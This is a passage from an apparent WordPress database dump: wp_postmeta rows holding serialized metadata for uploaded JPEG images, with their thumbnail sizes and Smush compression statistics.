size_before\";i:128667;s:10:\"size_after\";i:121523;s:4:\"time\";d:0.08;}}}'),(571,448,'_wp_attached_file','2022/08/23844616_1868197126528053_4157812209739993838_n.jpg'),(572,448,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:720;s:6:\"height\";i:960;s:4:\"file\";s:59:\"2022/08/23844616_1868197126528053_4157812209739993838_n.jpg\";s:8:\"filesize\";s:6:\"133021\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"23844616_1868197126528053_4157812209739993838_n-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"19835\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"23844616_1868197126528053_4157812209739993838_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"7476\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"23844616_1868197126528053_4157812209739993838_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"29802\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"23844616_1868197126528053_4157812209739993838_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3650\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(573,448,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.100752102430755;s:5:\"bytes\";i:3707;s:11:\"size_before\";i:60763;s:10:\"size_after\";i:57056;s:4:\"time\";d:0.08;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.44;s:5:\"bytes\";i:454;s:11:\"size_before\";i:3650;s:10:\"size_after\";i:3196;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.03;s:5:\"bytes\";i:600;s:11:\"size_before\";i:7476;s:10:\"size_after\";i:6876;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.04;s:5:\"bytes\";i:1503;s:11:\"size_before\";i:29802;s:10:\"size_after\";i:28299;s:4:\"time\";d:0.03;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.8;s:5:\"bytes\";i:1150;s:11:\"size_before\";i:19835;s:10:\"size_after\";i:18685;s:4:\"time\";d:0.03;}}}'),(574,449,'_wp_attached_file','2022/08/25592097_1899639136717185_4321270429465251825_n.jpg'),(575,449,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/25592097_1899639136717185_4321270429465251825_n.jpg\";s:8:\"filesize\";s:6:\"125079\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"25592097_1899639136717185_4321270429465251825_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"21567\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"25592097_1899639136717185_4321270429465251825_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"8022\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"25592097_1899639136717185_4321270429465251825_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:6:\"111007\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"25592097_1899639136717185_4321270429465251825_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"32880\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"25592097_1899639136717185_4321270429465251825_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3728\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(576,449,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.8497776573892235;s:5:\"bytes\";i:8594;s:11:\"size_before\";i:177204;s:10:\"size_after\";i:168610;s:4:\"time\";d:0.23;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.45;s:5:\"bytes\";i:464;s:11:\"size_before\";i:3728;s:10:\"size_after\";i:3264;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.33;s:5:\"bytes\";i:1150;s:11:\"size_before\";i:21567;s:10:\"size_after\";i:20417;s:4:\"time\";d:0.02;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.78;s:5:\"bytes\";i:624;s:11:\"size_before\";i:8022;s:10:\"size_after\";i:7398;s:4:\"time\";d:0.08;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.41;s:5:\"bytes\";i:1779;s:11:\"size_before\";i:32880;s:10:\"size_after\";i:31101;s:4:\"time\";d:0.03;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.12;s:5:\"bytes\";i:4577;s:11:\"size_before\";i:111007;s:10:\"size_after\";i:106430;s:4:\"time\";d:0.09;}}}'),(577,450,'_wp_attached_file','2022/08/25660384_1899639140050518_6277447985993158090_n.jpg'),(578,450,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2022/08/25660384_1899639140050518_6277447985993158090_n.jpg\";s:8:\"filesize\";s:6:\"134182\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"25660384_1899639140050518_6277447985993158090_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"20906\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"25660384_1899639140050518_6277447985993158090_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"8078\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"25660384_1899639140050518_6277447985993158090_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:6:\"110964\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:59:\"25660384_1899639140050518_6277447985993158090_n-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"31157\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:58:\"25660384_1899639140050518_6277447985993158090_n-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3987\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(579,450,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.331482877572933;s:5:\"bytes\";i:9335;s:11:\"size_before\";i:175092;s:10:\"size_after\";i:165757;s:4:\"time\";d:0.2;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.58;s:5:\"bytes\";i:693;s:11:\"size_before\";i:8078;s:10:\"size_after\";i:7385;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.62;s:5:\"bytes\";i:503;s:11:\"size_before\";i:3987;s:10:\"size_after\";i:3484;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.29;s:5:\"bytes\";i:1316;s:11:\"size_before\";i:20906;s:10:\"size_after\";i:19590;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.56;s:5:\"bytes\";i:1731;s:11:\"size_before\";i:31157;s:10:\"size_after\";i:29426;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.59;s:5:\"bytes\";i:5092;s:11:\"size_before\";i:110964;s:10:\"size_after\";i:105872;s:4:\"time\";d:0.15;}}}'),(580,458,'_wp_attached_file','2022/08/78c60d20331198e3173e4ef3aceda1e4.jpg'),(581,458,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:44:\"2022/08/78c60d20331198e3173e4ef3aceda1e4.jpg\";s:8:\"filesize\";s:5:\"41068\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"78c60d20331198e3173e4ef3aceda1e4-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"18909\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"78c60d20331198e3173e4ef3aceda1e4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"7015\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:44:\"78c60d20331198e3173e4ef3aceda1e4-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"28848\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:43:\"78c60d20331198e3173e4ef3aceda1e4-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"3063\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(582,458,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.6886833232471687;s:5:\"bytes\";i:1555;s:11:\"size_before\";i:57835;s:10:\"size_after\";i:56280;s:4:\"time\";d:0.11000000000000001;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.77;s:5:\"bytes\";i:54;s:11:\"size_before\";i:7015;s:10:\"size_after\";i:6961;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:3063;s:10:\"size_after\";i:3063;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.86;s:5:\"bytes\";i:540;s:11:\"size_before\";i:18909;s:10:\"size_after\";i:18369;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.33;s:5:\"bytes\";i:961;s:11:\"size_before\";i:28848;s:10:\"size_after\";i:27887;s:4:\"time\";d:0.07;}}}'),(583,459,'_wp_attached_file','2022/08/Capture.jpg'),(584,459,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:771;s:6:\"height\";i:435;s:4:\"file\";s:19:\"2022/08/Capture.jpg\";s:8:\"filesize\";s:5:\"36022\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"Capture-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"13916\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"Capture-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"10796\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"Capture-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"35479\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:19:\"Capture-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"19187\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:18:\"Capture-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"9172\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:5:\"Joyce\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1661267006\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(585,459,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:39.51214003387916;s:5:\"bytes\";i:34988;s:11:\"size_before\";i:88550;s:10:\"size_after\";i:53562;s:4:\"time\";d:0.16999999999999998;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:75.74;s:5:\"bytes\";i:6947;s:11:\"size_before\";i:9172;s:10:\"size_after\";i:2225;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:49.91;s:5:\"bytes\";i:6946;s:11:\"size_before\";i:13916;s:10:\"size_after\";i:6970;s:4:\"time\";d:0.02;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:64.54;s:5:\"bytes\";i:6968;s:11:\"size_before\";i:10796;s:10:\"size_after\";i:3828;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.58;s:5:\"bytes\";i:7018;s:11:\"size_before\";i:19187;s:10:\"size_after\";i:12169;s:4:\"time\";d:0.08;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.04;s:5:\"bytes\";i:7109;s:11:\"size_before\";i:35479;s:10:\"size_after\";i:28370;s:4:\"time\";d:0.05;}}}'),(586,460,'_wp_attached_file','2022/08/repair1.jpg'),(587,460,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:199;s:4:\"file\";s:19:\"2022/08/repair1.jpg\";s:8:\"filesize\";s:5:\"15148\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"repair1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"5895\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:18:\"repair1-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"2733\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(588,460,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.7881316643486325;s:5:\"bytes\";i:68;s:11:\"size_before\";i:8628;s:10:\"size_after\";i:8560;s:4:\"time\";d:0.03;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:2733;s:10:\"size_after\";i:2733;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.15;s:5:\"bytes\";i:68;s:11:\"size_before\";i:5895;s:10:\"size_after\";i:5827;s:4:\"time\";d:0.02;}}}'),(595,191,'_edit_lock','1661300327:1'),(596,467,'_wp_attached_file','2022/08/1.jpg'),(597,467,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:454;s:4:\"file\";s:13:\"2022/08/1.jpg\";s:8:\"filesize\";s:5:\"65082\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"1-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"23236\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"13869\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:13:\"1-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"32725\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:12:\"1-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"10462\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:5:\"Joyce\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1661344002\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(598,467,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:36.308723160464304;s:5:\"bytes\";i:29153;s:11:\"size_before\";i:80292;s:10:\"size_after\";i:51139;s:4:\"time\";d:0.07;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:51.24;s:5:\"bytes\";i:7106;s:11:\"size_before\";i:13869;s:10:\"size_after\";i:6763;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:67.2;s:5:\"bytes\";i:7030;s:11:\"size_before\";i:10462;s:10:\"size_after\";i:3432;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.76;s:5:\"bytes\";i:7380;s:11:\"size_before\";i:23236;s:10:\"size_after\";i:15856;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.34;s:5:\"bytes\";i:7637;s:11:\"size_before\";i:32725;s:10:\"size_after\";i:25088;s:4:\"time\";d:0.03;}}}'),(599,468,'_wp_attached_file','2022/08/2.jpg'),(600,468,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:811;s:6:\"height\";i:460;s:4:\"file\";s:13:\"2022/08/2.jpg\";s:8:\"filesize\";s:6:\"119413\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"2-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"24860\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"15644\";}s:12:\"medium_large\";a:5:{s:4:\"file\";s:13:\"2-768x436.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:436;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:6:\"101287\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:13:\"2-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"41500\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:12:\"2-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"11022\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:5:\"Joyce\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1661344044\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(601,468,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:21.957872092963417;s:5:\"bytes\";i:42667;s:11:\"size_before\";i:194313;s:10:\"size_after\";i:151646;s:4:\"time\";d:0.13;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:64.74;s:5:\"bytes\";i:7136;s:11:\"size_before\";i:11022;s:10:\"size_after\";i:3886;s:4:\"time\";d:0.02;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:47.1;s:5:\"bytes\";i:7369;s:11:\"size_before\";i:15644;s:10:\"size_after\";i:8275;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.12;s:5:\"bytes\";i:8764;s:11:\"size_before\";i:41500;s:10:\"size_after\";i:32736;s:4:\"time\";d:0.03;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.56;s:5:\"bytes\";i:7845;s:11:\"size_before\";i:24860;s:10:\"size_after\";i:17015;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.41;s:5:\"bytes\";i:11553;s:11:\"size_before\";i:101287;s:10:\"size_after\";i:89734;s:4:\"time\";d:0.05;}}}'),(602,469,'_wp_attached_file','2022/08/3.jpg'),(603,469,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:448;s:6:\"height\";i:334;s:4:\"file\";s:13:\"2022/08/3.jpg\";s:8:\"filesize\";s:5:\"43144\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"3-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"24786\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"13885\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:13:\"3-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"32940\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:12:\"3-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"9993\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:5:\"Joyce\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1661344096\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(604,469,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:34.99215724719377;s:5:\"bytes\";i:28555;s:11:\"size_before\";i:81604;s:10:\"size_after\";i:53049;s:4:\"time\";d:0.21;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:69.24;s:5:\"bytes\";i:6919;s:11:\"size_before\";i:9993;s:10:\"size_after\";i:3074;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:50.43;s:5:\"bytes\";i:7002;s:11:\"size_before\";i:13885;s:10:\"size_after\";i:6883;s:4:\"time\";d:0.06;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.08;s:5:\"bytes\";i:7207;s:11:\"size_before\";i:24786;s:10:\"size_after\";i:17579;s:4:\"time\";d:0.1;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.55;s:5:\"bytes\";i:7427;s:11:\"size_before\";i:32940;s:10:\"size_after\";i:25513;s:4:\"time\";d:0.04;}}}'),(605,471,'_wp_attached_file','2022/08/4.jpg'),(606,471,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:429;s:6:\"height\";i:558;s:4:\"file\";s:13:\"2022/08/4.jpg\";s:8:\"filesize\";s:5:\"62572\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"4-231x300.jpg\";s:5:\"width\";i:231;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"26557\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"14520\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:13:\"4-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"35055\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:12:\"4-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"10526\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:5:\"Joyce\";s:6